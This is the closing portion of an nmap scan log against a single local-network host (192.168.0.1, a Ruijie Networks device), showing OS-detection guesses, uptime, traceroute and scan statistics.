MAC Address: C0:B8:E6:B6:07:74 (Ruijie Networks)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.10, Linux 3.0
Uptime guess: 0.140 days (since Fri Apr 21 14:09:46 2023)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=257 (Good luck!)
IP ID Sequence Generation: All zeros

TRACEROUTE
HOP RTT     ADDRESS
1   0.89 ms 192.168.0.1

NSE: Script Post-scanning.
Initiating NSE at 17:31
Completed NSE at 17:31, 0.00s elapsed
Initiating NSE at 17:31
Completed NSE at 17:31, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 237.89 seconds
           Raw packets sent: 2031 (90.302KB) | Rcvd: 17 (1.378KB)